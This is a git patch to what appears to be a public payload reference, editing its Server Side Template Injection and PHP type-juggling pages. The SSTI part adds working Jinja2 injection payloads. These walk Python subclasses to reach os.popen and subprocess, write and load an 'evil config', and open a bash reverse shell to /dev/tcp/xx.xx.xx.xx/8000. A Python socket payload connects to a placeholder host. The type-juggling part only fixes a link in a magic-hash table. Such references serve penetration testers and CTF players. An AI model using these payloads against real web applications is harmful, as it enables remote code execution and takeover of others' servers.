From 504caa3b508214333ebb221be519bf2a4f98810e Mon Sep 17 00:00:00 2001
From: Swissky
Date: Wed, 10 Jul 2019 21:31:44 +0200
Subject: [PATCH] SSTI by calling Popen without guessing the offset

---
 Server Side Template Injection/README.md | 21 ++++++++++++++++-----
 Type Juggling/README.md | 2 +-
 2 files changed, 17 insertions(+), 6 deletions(-)

diff --git a/Server Side Template Injection/README.md b/Server Side Template Injection/README.md
index 9c95d16..d8fba0f 100644
--- a/Server Side Template Injection/README.md
+++ b/Server Side Template Injection/README.md
@@ -254,19 +254,30 @@ Listen for connexion
 nv -lnvp 8000
 ```
 
-Exploit the SSTI by calling subprocess.Popen.
+#### Exploit the SSTI by calling subprocess.Popen.
 
 :warning: the number 396 will vary depending of the application.
 
 ```python
 {{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
 ```
 
-Exploit the SSTI by writing an evil file.
+#### Exploit the SSTI by calling Popen without guessing the offset
 
 ```python
-{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }} # evil config
-{{ config.from_pyfile('/tmp/evilconfig.cfg') }} # load the evil config
-{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }} # connect to evil host
+{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen("python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect((\"ip\",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call([\"/bin/cat\", \"flag.txt\"]);'").read().zfill(417)}}{%endif%}{% endfor %}
+```
+
+#### Exploit the SSTI by writing an evil config file.
+
+```python
+# evil config
+{{ ''.__class__.__mro__[2].__subclasses__()[40]('/tmp/evilconfig.cfg', 'w').write('from subprocess import check_output\n\nRUNCMD = check_output\n') }}
+
+# load the evil config
+{{ config.from_pyfile('/tmp/evilconfig.cfg') }}
+
+# connect to evil host
+{{ config['RUNCMD']('bash -i >& /dev/tcp/xx.xx.xx.xx/8000 0>&1',shell=True) }}
 ```
 
diff --git a/Type Juggling/README.md b/Type Juggling/README.md
index 95c4cea..835e60a 100644
--- a/Type Juggling/README.md
+++ b/Type Juggling/README.md
@@ -46,7 +46,7 @@ If the hash computed starts with "0e" (or "0..0e") only followed by numbers, PHP
 | ---- | -------------------------- |:---------------------------------------------:| -------------:|
 | MD5 | 240610708 | 0e462097431906509019562988736854 | [@spazef0rze](https://twitter.com/spazef0rze/status/439352552443084800) |
 | SHA1 | 10932435112 | 0e07766915004133176347055865026311692244 | Independently found by Michael A. Cleverly & Michele Spagnuolo & Rogdham |
-| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/113807522401083392)1 |
+| SHA-224 | 10885164793773 | 0e281250946775200129471613219196999537878926740638594636 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1138075224010833921) |
 | SHA-256 | 34250003024812 | 0e46289032038065916139621039085883773413820991920706299695051332 | [@TihanyiNorbert](https://twitter.com/TihanyiNorbert/status/1148586399207178241) |
 
 ```php